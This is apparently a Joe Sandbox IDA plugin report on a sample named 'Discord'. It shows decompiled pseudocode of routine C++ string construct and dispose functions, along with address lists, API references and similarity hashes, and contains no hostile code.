Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_destroyRep10_Ss4_
String ID:
API String ID: 418774267-0
Opcode ID: 8b9d193cc3f8f85ab580ad9707bdf6df4503cb6e5d1bd81a0a42df534d131860
Instruction ID: 06c89d9f103097f06f759ed4388c1a268f4be7cddef2a99179e7b4a485f4ec44
Opcode Fuzzy Hash: 8b9d193cc3f8f85ab580ad9707bdf6df4503cb6e5d1bd81a0a42df534d131860
Instruction Fuzzy Hash: 5DE1537050A7028BC309EFBC8558619BBF4EB82375B214B3ED969CB1D1FF36D5458A82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE93C30 Relevance: 48.2, APIs: 32, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE93C30(intOrPtr __eax, void* __ecx) {
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char* _v52;
				intOrPtr _v56;
				char* _t130;
				char* _t131;
				char* _t132;
				char* _t133;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t140;
				char* _t141;
				char* _t142;
				char* _t143;
				char* _t144;
				char* _t145;
				char* _t146;
				char* _t147;
				char* _t148;
				char* _t149;
				char* _t150;
				char* _t151;
				char* _t152;
				char* _t153;
				char* _t154;
				char* _t155;
				char* _t156;
				char* _t157;
				char* _t158;
				char* _t159;
				char* _t160;
				void* _t164;
				intOrPtr* _t165;

				_t165 = _t164 - 0x30;
				_v56 = 0;
				 *_t165 = 0;
				_v52 =  &_v13;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 8)) = __eax;
				_t130 =  &_v44;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t130;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0xc)) = _t130;
				_t131 =  &_v43;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t131;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x10)) = _t131;
				_t132 =  &_v42;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t132;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x14)) = _t132;
				_t133 =  &_v41;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t133;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x18)) = _t133;
				_t134 =  &_v40;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t134;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x1c)) = _t134;
				_t135 =  &_v39;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t135;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x20)) = _t135;
				_t136 =  &_v38;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t136;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x24)) = _t136;
				_t137 =  &_v37;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t137;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x28)) = _t137;
				_t138 =  &_v36;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t138;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x2c)) = _t138;
				_t139 =  &_v35;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t139;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x30)) = _t139;
				_t140 =  &_v34;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t140;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x34)) = _t140;
				_t141 =  &_v33;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t141;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x38)) = _t141;
				_t142 =  &_v32;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t142;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x3c)) = _t142;
				_t143 =  &_v31;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t143;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x40)) = _t143;
				_t144 =  &_v30;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t144;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x44)) = _t144;
				_t145 =  &_v29;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t145;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x48)) = _t145;
				_t146 =  &_v28;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t146;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x4c)) = _t146;
				_t147 =  &_v27;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t147;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x50)) = _t147;
				_t148 =  &_v26;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t148;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x54)) = _t148;
				_t149 =  &_v25;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t149;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x58)) = _t149;
				_t150 =  &_v24;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t150;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x5c)) = _t150;
				_t151 =  &_v23;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t151;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x60)) = _t151;
				_t152 =  &_v22;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t152;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x64)) = _t152;
				_t153 =  &_v21;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t153;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x68)) = _t153;
				_t154 =  &_v20;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t154;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x6c)) = _t154;
				_t155 =  &_v19;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t155;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x70)) = _t155;
				_t156 =  &_v18;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t156;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x74)) = _t156;
				_t157 =  &_v17;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t157;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x78)) = _t157;
				_t158 =  &_v16;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t158;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x7c)) = _t158;
				_t159 =  &_v15;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t159;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x80)) = _t159;
				_t160 =  &_v14;
				_v56 = 0;
				 *_t165 = 0;
				_v52 = _t160;
				L6DE8DD40();
				 *((intOrPtr*)(__ecx + 0x84)) = _t160;
				return _t160;
			}

0x6de93c35
0x6de93c3c
0x6de93c44
0x6de93c4b
0x6de93c4f
0x6de93c54
0x6de93c57
0x6de93c5b
0x6de93c63
0x6de93c6a
0x6de93c6e
0x6de93c73
0x6de93c76
0x6de93c7a
0x6de93c82
0x6de93c89
0x6de93c8d
0x6de93c92
0x6de93c95
0x6de93c99
0x6de93ca1
0x6de93ca8
0x6de93cac
0x6de93cb1
0x6de93cb4
0x6de93cb8
0x6de93cc0
0x6de93cc7
0x6de93ccb
0x6de93cd0
0x6de93cd3
0x6de93cd7
0x6de93cdf
0x6de93ce6
0x6de93cea
0x6de93cef
0x6de93cf2
0x6de93cf6
0x6de93cfe
0x6de93d05
0x6de93d09
0x6de93d0e
0x6de93d11
0x6de93d15
0x6de93d1d
0x6de93d24
0x6de93d28
0x6de93d2d
0x6de93d30
0x6de93d34
0x6de93d3c
0x6de93d43
0x6de93d47
0x6de93d4c
0x6de93d4f
0x6de93d53
0x6de93d5b
0x6de93d62
0x6de93d66
0x6de93d6b
0x6de93d6e
0x6de93d72
0x6de93d7a
0x6de93d81
0x6de93d85
0x6de93d8a
0x6de93d8d
0x6de93d91
0x6de93d99
0x6de93da0
0x6de93da4
0x6de93da9
0x6de93dac
0x6de93db0
0x6de93db8
0x6de93dbf
0x6de93dc3
0x6de93dc8
0x6de93dcb
0x6de93dcf
0x6de93dd7
0x6de93dde
0x6de93de2
0x6de93de7
0x6de93dea
0x6de93dee
0x6de93df6
0x6de93dfd
0x6de93e01
0x6de93e06
0x6de93e09
0x6de93e0d
0x6de93e15
0x6de93e1c
0x6de93e20
0x6de93e25
0x6de93e28
0x6de93e2c
0x6de93e34
0x6de93e3b
0x6de93e3f
0x6de93e44
0x6de93e47
0x6de93e4b
0x6de93e53
0x6de93e5a
0x6de93e5e
0x6de93e63
0x6de93e66
0x6de93e6a
0x6de93e72
0x6de93e79
0x6de93e7d
0x6de93e82
0x6de93e85
0x6de93e89
0x6de93e91
0x6de93e98
0x6de93e9c
0x6de93ea1
0x6de93ea4
0x6de93ea8
0x6de93eb0
0x6de93eb7
0x6de93ebb
0x6de93ec0
0x6de93ec3
0x6de93ec7
0x6de93ecf
0x6de93ed6
0x6de93eda
0x6de93edf
0x6de93ee2
0x6de93ee6
0x6de93eee
0x6de93ef5
0x6de93ef9
0x6de93efe
0x6de93f01
0x6de93f05
0x6de93f0d
0x6de93f14
0x6de93f18
0x6de93f1d
0x6de93f20
0x6de93f24
0x6de93f2c
0x6de93f33
0x6de93f37
0x6de93f3c
0x6de93f3f
0x6de93f43
0x6de93f4b
0x6de93f52
0x6de93f56
0x6de93f5b
0x6de93f5e
0x6de93f62
0x6de93f6a
0x6de93f71
0x6de93f75
0x6de93f7a
0x6de93f7d
0x6de93f81
0x6de93f89
0x6de93f90
0x6de93f94
0x6de93f99
0x6de93f9c
0x6de93fa0
0x6de93fa8
0x6de93faf
0x6de93fb3
0x6de93fb8
0x6de93fbb
0x6de93fbf
0x6de93fc7
0x6de93fce
0x6de93fd2
0x6de93fd7
0x6de93fda
0x6de93fde
0x6de93fe6
0x6de93fed
0x6de93ff1
0x6de93ff6
0x6de93ffc
0x6de94000
0x6de94008
0x6de9400f
0x6de94013
0x6de94018
0x6de94024

APIs

_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93C4F
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93C6E
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93C8D
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93CAC
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93CCB
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93CEA
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D09
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D28
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D47
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D66
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93D85
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93DA4
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93DC3
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93DE2
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E01
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E20
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E3F
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E5E
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E7D
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93E9C
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93EBB
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93EDA
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93EF9
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93F18
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93F37
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93F56
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93F75
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93F94
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93FB3
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93FD2
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE93FF1
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE94013

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: S_constructSs12_
String ID:
API String ID: 1916361505-0
Opcode ID: 4f609f7b999e577f6529c0a1ba7f2724deb4bdb0d9a733b43dc1b89798ac9170
Instruction ID: f3a005094bc46ff748c71a68fefbeb38544b8324c91cabf72341e7d403d3ebad
Opcode Fuzzy Hash: 4f609f7b999e577f6529c0a1ba7f2724deb4bdb0d9a733b43dc1b89798ac9170
Instruction Fuzzy Hash: 37B14EB58093019ED701DF60C19475BBBE5AF84708F118A6EE9C88B295EB79C588CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE879B6 Relevance: 48.2, APIs: 32, Instructions: 188COMMON

Download Yara Rule

APIs

_ZN7config1D1Ev.DPUB1 ref: 6DE879BE
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE879C6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE879DC
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE879F3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87A0A
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87A21
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87A38
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87A4F
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87A66
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87A7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87A94
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87AAB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87AC2
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87AD9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87AF0
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87B07
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87B1E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87B35
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87B4C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87B63
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87B7A
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87B91
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87BA8
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87BBF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87BD6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87BED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87C04
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87C1E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87C38
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87C52
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87C6C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87C86

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$N7config1ResumeUnwind_
String ID:
API String ID: 520181850-0
Opcode ID: 4f5e44ccb0f385c20295ad0e73e49e44b17e34025f35bca5905950f60072c067
Instruction ID: 1e6e1d3efd8370eb8772a87f11f2c97c5faedb33e9e5c3e5dc241e3db94ae335
Opcode Fuzzy Hash: 4f5e44ccb0f385c20295ad0e73e49e44b17e34025f35bca5905950f60072c067
Instruction Fuzzy Hash: 409185B8D0595A8FCF10EFB4C59899CB7F4AF4432CF1145AAC859AB251EB30A64DCF42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BD5F Relevance: 48.2, APIs: 32, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6DE8BD5F() {
				intOrPtr _t65;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t131;
				void* _t132;
				intOrPtr* _t133;

				_t97 = _t65;
				_t131 = _t132 - 0xf4;
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0xfc)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x100)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x104)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x108)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x10c)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x110)));
				 *_t133 = _t131;
				L6DE8DD48();
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x118)) - 0xc);
				 *_t133 = _t131;
				L6DE8DD48();
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x120)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x124)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x128)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x12c)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x130)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x134)));
				 *_t133 = _t131;
				L6DE8DD48();
				_push(_t130);
				 *_t133 = _t131;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t132 - 0x13c)) - 0xc);
				while(1) {
					 *_t133 = _t131;
					L6DE8DD48();
					_push(_t129);
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x144)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x148)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x14c)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x150)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x154)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x158)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push(_t130);
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x160)) - 0xc);
					 *_t133 = _t131;
					L6DE8DD48();
					_push(_t129);
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x168)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x16c)));
					 *_t133 = _t131;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t132 - 0x170)));
					_t96 =  *((intOrPtr*)(_t132 - 0x174));
					 *_t133 = _t131;
					L6DE8DD48();
					_push(_t96);
					 *_t133 = _t97;
					L6DE8EBA0();
					_t97 = _t96;
					_t131 = _t132 - 0xf4;
				}
			}

0x6de8bd5f
0x6de8bd67
0x6de8bd6d
0x6de8bd73
0x6de8bd78
0x6de8bd7f
0x6de8bd85
0x6de8bd8a
0x6de8bd91
0x6de8bd97
0x6de8bd9c
0x6de8bda3
0x6de8bda9
0x6de8bdae
0x6de8bdb5
0x6de8bdbb
0x6de8bdc0
0x6de8bdc7
0x6de8bdcd
0x6de8bdd2
0x6de8bdd9
0x6de8bddf
0x6de8bdeb
0x6de8bdf1
0x6de8bdf6
0x6de8bdfd
0x6de8be03
0x6de8be0f
0x6de8be15
0x6de8be1a
0x6de8be21
0x6de8be27
0x6de8be2c
0x6de8be33
0x6de8be39
0x6de8be3e
0x6de8be45
0x6de8be4b
0x6de8be50
0x6de8be57
0x6de8be5d
0x6de8be62
0x6de8be69
0x6de8be6f
0x6de8be74
0x6de8be7b
0x6de8be81
0x6de8be86
0x6de8be8d
0x6de8be93
0x6de8be98
0x6de8be99
0x6de8be9f
0x6de8bea5
0x6de8beaa
0x6de8beb1
0x6de8beb7
0x6de8bebc
0x6de8bec3
0x6de8bec9
0x6de8bece
0x6de8bed5
0x6de8bedb
0x6de8bee0
0x6de8bee7
0x6de8beed
0x6de8bef2
0x6de8bef9
0x6de8beff
0x6de8bf04
0x6de8bf0b
0x6de8bf11
0x6de8bf16
0x6de8bf1d
0x6de8bf23
0x6de8bf28
0x6de8bf2f
0x6de8bf35
0x6de8bf3a
0x6de8bf41
0x6de8bf47
0x6de8bf4c
0x6de8bf53
0x6de8bf59
0x6de8bf5e
0x6de8bf65
0x6de8bf6b
0x6de8bf70
0x6de8bf77
0x6de8bf7d
0x6de8bf82
0x6de8bf83
0x6de8bf89
0x6de8bf8f
0x6de8bf94
0x6de8bf95
0x6de8bf98
0x6de8bf9d
0x6de8bf9f
0x6de8bf9f

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8BD73
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE8BD85
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE8BD97
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000), ref: 6DE8BDA9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE8BDBB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000), ref: 6DE8BDCD
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BDDF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BDF1
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE03
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE15
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE27
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE39
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE4B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE5D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE6F
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE81
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BE93
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEA5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BEB7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BEC9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BEDB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BEED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEFF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF11
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF23
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF35
